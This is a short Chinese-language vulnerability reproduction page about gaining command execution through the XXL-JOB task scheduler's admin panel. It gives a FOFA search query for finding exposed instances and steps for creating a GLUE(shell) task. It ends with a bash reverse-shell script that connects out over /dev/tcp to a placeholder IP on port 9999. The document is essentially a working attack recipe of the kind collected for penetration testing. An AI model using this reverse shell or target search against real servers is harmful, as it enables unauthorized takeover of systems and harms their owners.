# XXL-JOB 任务调度中心 后台任意命令执行漏洞
## 漏洞描述
XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限
## 漏洞影响
> [!NOTE]
>
> XXL-JOB
## FOFA
> [!NOTE]
>
> app="XXL-JOB" || title="任务调度中心"
## 漏洞复现
登录后台增加一个任务
![](http://wikioss.peiqi.tech/vuln/xxl-4.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
> [!NOTE]
>
> 注意运行模式需要为 GLUE(shell)
![](http://wikioss.peiqi.tech/vuln/xxl-5.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
点击 GLUE IDE编辑脚本
![](http://wikioss.peiqi.tech/vuln/xxl-6.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
![](http://wikioss.peiqi.tech/vuln/xxl-7.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
执行探测出网,和任务调用是否可执行
反弹一个shell
```
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'
```
![](http://wikioss.peiqi.tech/vuln/xxl-8.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)